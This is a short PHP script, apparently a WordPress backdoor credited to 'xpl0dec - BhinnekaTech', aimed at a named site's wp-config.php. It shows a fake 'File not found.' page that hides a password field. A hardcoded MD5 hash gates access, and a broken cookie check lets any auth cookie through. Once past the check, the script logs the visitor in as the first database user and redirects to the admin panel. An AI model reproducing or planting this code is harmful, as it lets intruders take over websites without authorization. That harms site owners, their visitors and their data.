<?php

//Author by xpl0dec - BhinnekaTech
if(file_exists($_SERVER['DOCUMENT_ROOT'] . "/home/sastrajepang/public_html/wp-config.php")) {
    include($_SERVER['DOCUMENT_ROOT'] . "/home/sastrajepang/public_html/wp-config.php");
}else {
    echo "path wp-config salah";
    die();
}

function login($pass) {
    if(isset($_POST)) {
        if(md5($_POST['password']) == $pass) {
            setcookie('auth', md5($pass));
            header("Refresh:0");
        }else {
            echo "File not found.<br><form method='POST'><input style='border: 0;' name='password' type='password'></form>";
            die();
        }
    }
}

  $pass = "a2bf01e7bc417f98e2f022b89b5a2737";

  if(isset($_COOKIE['auth']) || $_COOKIE['auth'] == md5($pass)) {
        $get_row = $wpdb->get_row("SELECT * FROM $wpdb->users", ARRAY_A, 0);

        if(!empty($get_row)) {
            $username = $get_row['user_login'];
        
            $userdata = get_user_by("login", $username);
            $user_id = $userdata->ID;
         
            wp_set_current_user($user_id, $username);
            wp_set_auth_cookie($user_id);
            wp_redirect(admin_url());
            exit;
        }else {
             die("Koneksi database gagal");
        }
    }else {
        echo login($pass);
    }

?>

